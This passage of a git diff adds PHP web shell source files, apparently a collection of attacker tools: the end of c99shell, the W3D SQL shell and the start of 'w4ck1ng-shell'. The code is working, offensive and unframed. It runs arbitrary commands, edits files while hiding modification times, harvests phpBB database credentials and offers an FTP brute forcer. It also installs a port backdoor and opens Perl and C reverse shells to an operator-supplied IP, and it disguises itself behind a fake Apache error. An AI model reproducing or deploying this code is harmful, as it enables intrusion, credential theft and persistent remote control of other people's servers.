+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ //For simple size- and speed-optimization.
+ $imgequals = array(
+  "ext_tar"=>array("ext_tar","ext_r00","ext_ace","ext_arj","ext_bz","ext_bz2","ext_tbz","ext_tbz2","ext_tgz","ext_uu","ext_xxe","ext_zip","ext_cab","ext_gz","ext_iso","ext_lha","ext_lzh","ext_pbk","ext_rar","ext_uuf"),
+  "ext_php"=>array("ext_php","ext_php3","ext_php4","ext_php5","ext_phtml","ext_shtml","ext_htm"),
+  "ext_jpg"=>array("ext_jpg","ext_gif","ext_png","ext_jpeg","ext_jfif","ext_jpe","ext_bmp","ext_ico","ext_tif","tiff"),
+  "ext_html"=>array("ext_html","ext_htm"),
+  "ext_avi"=>array("ext_avi","ext_mov","ext_mvi","ext_mpg","ext_mpeg","ext_wmv","ext_rm"),
+  "ext_lnk"=>array("ext_lnk","ext_url"),
+  "ext_ini"=>array("ext_ini","ext_css","ext_inf"),
+  "ext_doc"=>array("ext_doc","ext_dot"),
+  "ext_js"=>array("ext_js","ext_vbs"),
+  "ext_cmd"=>array("ext_cmd","ext_bat","ext_pif"),
+  "ext_wri"=>array("ext_wri","ext_rtf"),
+  "ext_swf"=>array("ext_swf","ext_fla"),
+  "ext_mp3"=>array("ext_mp3","ext_au","ext_midi","ext_mid"),
+  "ext_htaccess"=>array("ext_htaccess","ext_htpasswd","ext_ht","ext_hta","ext_so")
+ );
+ if (!$getall)
+ {
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  foreach($imgequals as $k=>$v) {if (in_array($img,$v)) {$img = $k; break;}}
+  if (empty($images[$img])) {$img = "small_unk";}
+  if (in_array($img,$ext_tar)) {$img = "ext_tar";}
+  echo base64_decode($images[$img]);
+ }
+ else
+ {
+  foreach($imgequals as $a=>$b) {foreach ($b as $d) {if ($a != $d) {if (!empty($images[$d])) {echo("Warning! Remove \$images[".$d."]<br>");}}}}
+  natsort($images);
+  $k = array_keys($images);
+  echo  "<center>";
+  foreach ($k as $u) {echo $u.":<img src=\"".$surl."act=img&img=".$u."\" border=\"1\"><br>";}
+  echo "</center>";
+ }
+ exit;
+}
+if ($act == "about") {echo "<center><b>Credits:<br>Idea, leading and coding by tristram[CCTeaM].<br>Beta-testing and some tips - NukLeoN [AnTiSh@Re tEaM].<br>Thanks all who report bugs.<br>All bugs send to tristram's ICQ #656555 <a href=\"http://wwp.icq.com/scripts/contact.dll?msgto=656555\">icq</a>.</b>";}
+?>
+</td></tr></table><a bookmark="minipanel"><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2"><p align="center"><b>:: <a href="<?php echo $surl; ?>act=cmd&d=<?php echo urlencode($d); ?>"><b>Command execute</b></a> ::</b></p></td></tr>
+<tr><td width="50%" height="1" valign="top"><center><b>Enter: </b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="cmd" size="50" value="<?php echo htmlspecialchars($cmd); ?>"><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td><td width="50%" height="1" valign="top"><center><b>Select: </b><form action="<?php echo $surl; ?>act=cmd" method="POST"><input type=hidden name=act value="cmd"><input type=hidden name="d" value="<?php echo $dispd; ?>"><select name="cmd"><?php foreach ($cmdaliases as $als) {echo "<option value=\"".htmlspecialchars($als[1])."\">".htmlspecialchars($als[0])."</option>";} ?></select><input type=hidden name="cmd_txt" value="1">&nbsp;<input type=submit name=submit value="Execute"></form></td></tr></TABLE>
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=search&d=<?php echo urlencode($d); ?>"><b>Search</b></a> ::</b><form method="POST"><input type=hidden name=act value="search"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="search_name" size="29" value="(.*)">&nbsp;<input type="checkbox" name="search_name_regexp" value="1"  checked> - regexp&nbsp;<input type=submit name=submit value="Search"></form></center></p></td>
+ <td width="50%" height="1" valign="top"><center><b>:: <a href="<?php echo $surl; ?>act=upload&d=<?php echo $ud; ?>"><b>Upload</b></a> ::</b><form method="POST" ENCTYPE="multipart/form-data"><input type=hidden name=act value="upload"><input type="file" name="uploadfile"><input type=hidden name="miniform" value="1">&nbsp;<input type=submit name=submit value="Upload"><br><?php echo $wdt; ?></form></center></td>
+</tr>
+</table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Make Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="mkdir"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkdir" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Make File ::</b><form method="POST"><input type=hidden name=act value="mkfile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="mkfile" size="50" value="<?php echo $dispd; ?>"><input type=hidden name="ft" value="edit">&nbsp;<input type=submit value="Create"><br><?php echo $wdt; ?></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="50%" height="1" valign="top"><center><b>:: Go Dir ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="ls"><input type="text" name="d" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td><td width="50%" height="1" valign="top"><center><b>:: Go File ::</b><form action="<?php echo $surl; ?>"><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?>"><input type="text" name="f" size="50" value="<?php echo $dispd; ?>">&nbsp;<input type=submit value="Go"></form></center></td></tr></table>
+<br><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="990" height="1" valign="top"><p align="center"><b>--[ c99shell v. <?php echo $shver; ?> <a href="<?php echo $surl; ?>act=about"><u><b>powered by</b></u></a> Captain Crunch Security Team | <a href="http://ccteam.ru"><font color="#FF0000">http://ccteam.ru</font></a><font color="#FF0000"></font> | Generation time: <?php echo round(getmicrotime()-starttime,4); ?> ]--</b></p></td></tr></table>
+</body></html><?php chdir($lastdir); c99shexit(); ?>
+
diff --git a/138shell/W/w3d.php.txt b/138shell/W/w3d.php.txt
new file mode 100644
index 0000000..f9d2213
--- /dev/null
+++ b/138shell/W/w3d.php.txt
@@ -0,0 +1,128 @@
+<?php
+/*
+W3D Shell
+By: Warpboy
+www.private-node.net
+Version: 0x01
+Info: Created specifically for straight-foreward SQL interaction.
+Planned updates: More features, easier interaction with database(s)
+*/
+
+//Store User Input
+$user = $_POST['user'];
+$pass = $_POST['pass'];
+$dbn = $_POST['db'];
+$host = "localhost";
+
+//Comprehend Change
+if($_REQUEST['change']) {
+setcookie("user", "$user", time()+3600);
+setcookie("pass", "$pass", time()+3600);
+setcookie("db", "$dbn", time()+3600);
+}
+//Define cookies in vars
+$username = $_COOKIE["user"];
+$password = $_COOKIE["pass"];
+$database = $_COOKIE["db"];
+
+//build header
+echo '<title>W3D Shell // By: Warpboy \\\ SQL Shell</title>';
+echo '
+<font color=#00CC00><body bgcolor=black>
+<center><table border=0 cellpadding=0 cellspacing=0 width=50% style=font-size: 14px; font-family: Arial;>
+<tr><td bgcolor=#00CC00><center><font size="3" face="Verdana"><b>W3D SQL Shell</font></tr></td>
+<tr><td><font color=#FFFFFF><center><b><font size="1" face="Georgia"><marquee speed=1>By: Warpboy</td></font></tr>
+';
+echo '
+<tr><td><font color=#00CC00><center><b><br>[]Database Info[]</td></tr><tr><td><font color=#FFFFFF><b><pre><br>
+<center>
+<form action="w3d.php" method="post">
+Username: <input type="text" name="user" </input>
+Password: <input type="text" name="pass" />
+Database: <input type="text" name="db" />
+<input type="submit" value="Change" name="change"  />
+</form>    </tr></td><table>
+';
+echo '
+<form action="w3d.php" method="get">
+<b><font color=#00CC00><br>Query:</font></b> <input type="text" name="query" size="65"/>
+<input type="submit"  />
+</form>';
+
+//Initial pre-cookie
+$con = @mysql_connect($host, $user, $pass);
+if (!$con){
+ //secondary post-cookie
+ $con1 = @mysql_connect($host, $username, $password);
+ if(!$con1) {
+ echo "<br><b><font color=#00CC00>Currently not connected.<br>";
+ }
+ }
+
+//Notify user of current connection
+if($_REQUEST['change'] && $user != '') {
+echo "<br><b><font color=#00CC00>Connected to MySQL as user</font>" . "<font color=red> $user</b></font>";
+}
+if(!$_REQUEST['change'] && $username != '') {
+echo "<br><b><font color=#00CC00>Connected to MySQL as user</font>" . "<font color=red> $username</b></font>";
+}
+
+//Database Time
+//initial pre-cookie
+$db_c = @mysql_select_db($dbn,$con);
+if(!$db_c) {
+//secondary post-cookie
+$db_d = @mysql_select_db($database,$con1);
+if(!$db_d) {
+if(isset($database) || isset($dbn)) {
+echo "<br><font color=#00CC00><b>Unable to access database!";
+}
+}
+}
+//query function
+query();
+
+function query() {
+$query = $_GET['query'];
+if($query == '') {
+echo "<br><font color=#00CC00><b>No Query Executed</b></font>";
+}
+else {
+//Query Time
+$query1 = str_replace("\\", " ", $query);
+$result = @mysql_query("$query1");
+echo "<br><b><font color=#00CC00>Query Results: <br /></b></font> ";
+        echo "<table border=1 cellpadding=0 cellspacing=0 width=100% style=\"font-size: 14px; font-family: Trebuchet;\">
+                <tr bgcolor=white align=center style=\"font-weight: bold;\">\n";
+
+$rr = @mysql_num_fields($result);
+                for($kz=0; $kz<$rr; $kz++)
+                {
+                        $ee = @mysql_field_name($result,$kz);
+                        echo "<td bgcolor=#FFFFFF>$ee</td>";
+                }
+                echo "</tr>\n";
+
+                $vv = true;
+                while ($line = @mysql_fetch_array($result, MYSQL_ASSOC)) {
+                        if($vv === true){
+                        echo "<tr align=center bgcolor=#00CC00>\n";
+                        $vv = false;
+                        }
+                        else{
+                        echo "<tr align=center bgcolor=#00CC00>\n";
+                        $vv = true;
+                        }
+                        foreach ($line as $col_value) {
+                echo "<td>$col_value</td>\n";
+                        }
+                echo "</tr>\n";
+                }
+                echo "</table>\n";
+
+                @mysql_free_result($result);
+
+}
+}
+
+?>
\ No newline at end of file
diff --git a/138shell/W/w4k.php.txt b/138shell/W/w4k.php.txt
new file mode 100644
index 0000000..d870490
--- /dev/null
+++ b/138shell/W/w4k.php.txt
@@ -0,0 +1,2830 @@
+<?php
+if (!function_exists("myshellexec"))
+{
+if(is_callable("popen")){
+function myshellexec($command) {
+if (!($p=popen("($command)2>&1","r"))) {
+return 126;
+}
+while (!feof($p)) {
+$line=fgets($p,1000);
+$out .= $line;
+}
+pclose($p);
+return $out;
+}
+}else{
+function myshellexec($cmd)
+{
+ global $disablefunc;
+ $result = "";
+ if (!empty($cmd))
+ {
+  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
+  elseif (($result = `$cmd`) !== FALSE) {}
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
+  elseif (is_resource($fp = popen($cmd,"r")))
+  {
+   $result = "";
+   while(!feof($fp)) {$result .= fread($fp,1024);}
+   pclose($fp);
+  }
+ }
+ return $result;
+}
+}
+}
+
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
+ } 
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{ 
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor);
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+ //$blah = ex("gcc back.c -o backc");
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+ //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+
+ini_set("memory_limit","300M");
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
+if (!function_exists("file_get_contents")) { function file_get_contents($filename){ $handle = fopen($filename, "r"); $retval = fread($handle, filesize($filename)); fclose($handle);return $retval;}}
+error_reporting(5);
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+define("starttime",getmicrotime());
+//removed backdoor
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
+$shver = "w4ck1ng-shell (Private Build v0.3)"; 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";}
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);}
+else {$surl = $_REQUEST["c99sh_surl"]; 
+}
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; 
+}
+$surl = htmlspecialchars($surl);
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
+$login = ""; 
+$pass = ""; 
+$md5_pass = "";
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
+$login_txt = "Apache Error: Restricted File";
+$accessdeniedmess = "access denied";
+$gzipencode = TRUE; 
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time
+$donated_html = "";
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html.
+$curdir = "./"; 
+//$curdir = getenv("DOCUMENT_ROOT");
+$tmpdir = ""; 
+$tmpdir_log = "./"; 
+//$log_email = "synsta@gmail.com"; 
+$sort_default = "0a"; 
+$sort_save = TRUE;
+$ftypes  = array(
+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","c",".bash_history","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+$safemode_diskettes = array("a"); 
+$hexdump_lines = 8;// lines in hex preview file
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+
+$sess_cookie = "c99shvars"; // Cookie-variable name
+
+
+
+//Quick launch
+$quicklaunch = array(
+ array("<hr><b>[Home]</b>",$surl),
+ array("<b>[Search]</b>",$surl."act=search&d=%d"),
+ array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"),
+ array("<b>[Processes]</b>",$surl."act=processes&d=%d"),
+ array("<b>[FTP Brute Forcer]</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>[Server Information]</b>",$surl."act=security&d=%d"),
+ array("<b>[SQL Manager]</b>",$surl."act=sql&d=%d"),
+ array("<b>[Eval PHP code]</b>",$surl."act=eval&d=%d&eval=//readfile('/etc/passwd');"),
+ array("<b>[Back-Connection]</b>",$surl."act=backc"),
+ array("<b>[Self remove]</b>",$surl."act=selfremove"),
+ array("<b>[Install Proxy]</b>",$surl."act=proxy"),
+ array("<b>[Backdoor Host]</b>",$surl."act=shbd"),
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+//END CONFIGURATION
+
+
+// \/Next code isn't for editing\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
